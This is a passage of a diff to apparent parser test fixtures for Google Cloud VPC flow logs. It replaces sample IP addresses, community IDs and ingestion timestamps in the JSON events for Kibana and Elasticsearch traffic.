"{\"insertId\":\"y4wffpfk2eron\",\"jsonPayload\":{\"bytes_sent\":\"11137\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33576},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821302149Z\",\"packets_sent\":\"96\",\"reporter\":\"SRC\",\"rtt_msec\":\"1\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:20.510464198Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:20.510464198Z", "end": "2019-06-14T03:49:51.821302149Z", @@ -10075,17 +10075,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 57300, "bytes": 1458, - "ip": "203.0.113.12", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:h/SRCB44wNMtbU2v3aeGitgKFRo=", + "community_id": "1:Xvu/n5tUKDHRNKc/db6OBLZgf9A=", "bytes": 1458, "transport": "tcp", "type": "ipv4", @@ -10099,7 +10099,7 @@ }, "related": { "ip": [ - "203.0.113.12", + "67.43.156.13", "10.87.40.76" ] }, @@ -10124,8 +10124,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868795900Z", - "original": "{\"insertId\":\"y4wffpfk2eroy\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.12\",\"src_port\":57300},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:48:22.156322353Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:48:22.044604322Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391710600Z", + "original": "{\"insertId\":\"y4wffpfk2eroy\",\"jsonPayload\":{\"bytes_sent\":\"1458\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":57300},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:48:22.156322353Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:48:22.044604322Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:48:22.044604322Z", "end": "2019-06-14T03:48:22.156322353Z", @@ -10146,9 +10146,9 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 54662, - "ip": "203.0.113.12" + "ip": "67.43.156.13" }, "source": { "address": "10.87.40.76", @@ -10162,7 +10162,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:jQRBIxNHMzfkP/qDqSMZJb7cjWg=", + "community_id": "1:ODIAu0FZz5JAnJ3zuMNp2ecW7FE=", "bytes": 1776, "transport": "tcp", "type": "ipv4", @@ -10177,7 +10177,7 @@ "related": { "ip": [ "10.87.40.76", - "203.0.113.12" + "67.43.156.13" ] }, "gcp": { @@ -10201,8 +10201,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868799Z", - "original": "{\"insertId\":\"y4wffpfk2erof\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"203.0.113.12\",\"dest_port\":54662,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:45:12.142682672Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:45:12.027895189Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391715300Z", + "original": "{\"insertId\":\"y4wffpfk2erof\",\"jsonPayload\":{\"bytes_sent\":\"1776\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":54662,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:45:12.142682672Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:45:12.027895189Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:45:12.027895189Z", "end": "2019-06-14T03:45:12.142682672Z", @@ -10229,18 +10229,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33572, "bytes": 11674, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 96 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:vae84XmwYYRVAple470fSnJPul0=", + "community_id": "1:yNQZdh5JH2wK9uzpK/mTdNYogpE=", "bytes": 11674, "name": "default", "transport": "tcp", @@ -10262,7 +10262,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -10299,8 +10299,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868802200Z", - "original": "{\"insertId\":\"y4wffpfk2erov\",\"jsonPayload\":{\"bytes_sent\":\"11674\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33572},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821056075Z\",\"packets_sent\":\"96\",\"reporter\":\"DEST\",\"rtt_msec\":\"335\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470754779Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391719Z", + "original": "{\"insertId\":\"y4wffpfk2erov\",\"jsonPayload\":{\"bytes_sent\":\"11674\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33572},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821056075Z\",\"packets_sent\":\"96\",\"reporter\":\"DEST\",\"rtt_msec\":\"335\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.470754779Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.470754779Z", "end": "2019-06-14T03:49:51.821056075Z", @@ -10327,18 +10327,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33540, "bytes": 62831, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 346 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:MQOhdELEvqJXellZlJ8csNiAoAM=", + "community_id": "1:F/7D/X852gHR0MKQ6f237loatS0=", "bytes": 62831, "name": "default", "transport": "tcp", @@ -10360,7 +10360,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -10397,8 +10397,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868805300Z", - "original": "{\"insertId\":\"y4wffpfk2erop\",\"jsonPayload\":{\"bytes_sent\":\"62831\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33540},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789112562Z\",\"packets_sent\":\"346\",\"reporter\":\"DEST\",\"rtt_msec\":\"313\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074813982Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391723500Z", + "original": "{\"insertId\":\"y4wffpfk2erop\",\"jsonPayload\":{\"bytes_sent\":\"62831\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33540},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.789112562Z\",\"packets_sent\":\"346\",\"reporter\":\"DEST\",\"rtt_msec\":\"313\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074813982Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.074813982Z", "end": "2019-06-14T03:49:51.789112562Z", @@ -10419,10 +10419,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -10436,7 +10436,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:UPRJyBawh4JbZzzvBFfenzP0Yco=", + "community_id": "1:yy2U6IJ6o+0ezyD0HfX5dcSPTyA=", "bytes": 15169, "name": "default", "transport": "tcp", @@ -10459,7 +10459,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -10495,8 +10495,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868808400Z", - "original": "{\"insertId\":\"y4wffpfk2erou\",\"jsonPayload\":{\"bytes_sent\":\"15169\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33574},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821291282Z\",\"packets_sent\":\"93\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466811088Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391727600Z", + "original": "{\"insertId\":\"y4wffpfk2erou\",\"jsonPayload\":{\"bytes_sent\":\"15169\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33574},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:51.821291282Z\",\"packets_sent\":\"93\",\"reporter\":\"SRC\",\"rtt_msec\":\"2\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.466811088Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:08.466811088Z", "end": "2019-06-14T03:49:51.821291282Z", @@ -10523,17 +10523,17 @@ "as": { "number": 15169 }, - "address": "203.0.113.12", + "address": "67.43.156.13", "port": 54662, "bytes": 1464, - "ip": "203.0.113.12", + "ip": "67.43.156.13", "packets": 7 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:jQRBIxNHMzfkP/qDqSMZJb7cjWg=", + "community_id": "1:ODIAu0FZz5JAnJ3zuMNp2ecW7FE=", "bytes": 1464, "transport": "tcp", "type": "ipv4", @@ -10547,7 +10547,7 @@ }, "related": { "ip": [ - "203.0.113.12", + "67.43.156.13", "10.87.40.76" ] }, @@ -10572,8 +10572,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868811400Z", - "original": "{\"insertId\":\"y4wffpfk2eroj\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"203.0.113.12\",\"src_port\":54662},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:12.142682672Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:45:12.027895189Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391731300Z", + "original": "{\"insertId\":\"y4wffpfk2eroj\",\"jsonPayload\":{\"bytes_sent\":\"1464\",\"connection\":{\"dest_ip\":\"10.87.40.76\",\"dest_port\":5601,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":54662},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:45:12.142682672Z\",\"packets_sent\":\"7\",\"reporter\":\"DEST\",\"rtt_msec\":\"36\",\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"start_time\":\"2019-06-14T03:45:12.027895189Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:45:12.027895189Z", "end": "2019-06-14T03:45:12.142682672Z", @@ -10594,10 +10594,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -10611,7 +10611,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:daatd5jK/QqBAjEYb64ySmXIcOU=", + "community_id": "1:VbVjklGBQiIYWy94d7CXlQ+ISxo=", "bytes": 64588, "name": "default", "transport": "tcp", @@ -10634,7 +10634,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.248" + "67.43.156.14" ] }, "gcp": { @@ -10670,8 +10670,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868814600Z", - "original": "{\"insertId\":\"y4wffpfk2erow\",\"jsonPayload\":{\"bytes_sent\":\"64588\",\"connection\":{\"dest_ip\":\"198.51.100.248\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33560},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"362\",\"reporter\":\"SRC\",\"rtt_msec\":\"11\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075859688Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391735300Z", + "original": "{\"insertId\":\"y4wffpfk2erow\",\"jsonPayload\":{\"bytes_sent\":\"64588\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":33560},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565287007Z\",\"packets_sent\":\"362\",\"reporter\":\"SRC\",\"rtt_msec\":\"11\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075859688Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075859688Z", "end": "2019-06-14T03:49:59.565287007Z", @@ -10698,18 +10698,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33536, "bytes": 67315, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 354 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:c/u5Mg/PGR6riBWo0YXGpZWs3cI=", + "community_id": "1:LeOPi08ubqTh6aNT93e8m/GSF+Y=", "bytes": 67315, "name": "default", "transport": "tcp", @@ -10731,7 +10731,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -10768,8 +10768,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868817700Z", - "original": "{\"insertId\":\"y4wffpfk2erot\",\"jsonPayload\":{\"bytes_sent\":\"67315\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33536},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565156020Z\",\"packets_sent\":\"354\",\"reporter\":\"DEST\",\"rtt_msec\":\"194\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:08.150481417Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:16.453102376Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:16.453102376Z\"}", + "ingested": "2021-12-09T13:37:46.391738600Z", + "original": 